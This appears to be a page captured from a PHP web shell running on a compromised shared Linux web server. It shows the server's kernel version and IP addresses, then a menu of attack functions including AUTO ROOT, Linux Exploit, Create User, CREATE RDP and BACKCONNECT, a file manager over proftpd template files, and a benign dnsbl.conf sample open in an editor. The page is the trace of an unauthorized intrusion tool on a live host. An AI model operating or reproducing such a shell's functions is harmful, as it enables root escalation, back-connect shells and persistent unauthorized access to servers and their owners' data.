Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
proftpd /
templates /
[ HOME SHELL ]
Name
Size
Permission
Action
dnsbl.conf
924
B
-rw-r--r--
geoip.conf
4.25
KB
-rw-r--r--
ldap.conf
701
B
-rw-r--r--
modules.conf
3.37
KB
-rw-r--r--
proftpd.conf
5.68
KB
-rw-r--r--
sftp.conf
1.16
KB
-rw-r--r--
snmp.conf
982
B
-rw-r--r--
sql.conf
862
B
-rw-r--r--
tls.conf
2.03
KB
-rw-r--r--
virtuals.conf
832
B
-rw-r--r--
welcome.msg
170
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : dnsbl.conf
# # Proftpd sample configuration for dnsbl. # <IfModule mod_dnsbl.c> # Syntax: DNSBLDomain domain # Default: None DNSBLDomain sbl.spamhaus.org DNSBLDomain xbl.spamhaus.org # Syntax: DNSBLEngine on|off # Default: None # usually used inside a <VirtualHost> section to enable DNS blacklist # use for a particular virtual host. DNSBLEngine on # Syntax: DNSBLLog file # Default: None DNSBLLog /var/log/proftpd/mod_dnsbl.log # Syntax: DNSBLPolicy "allow,deny"|"deny,allow" # Default: None # If DNSBLPolicy is configured using "allow,deny", then the mod_dnsbl module # will allow the connection, unless the connecting client is blacklisted # by any of the configured DNSBLDomain sites. # If DNSBLPolicy is configured using "deny,allow", then the mod_dnsbl module # will not allow the connection, unless the connecting client is listed by # any of the configured DNSBLDomain sites. DNSBLPolicy "allow,deny" </IfModule>
Close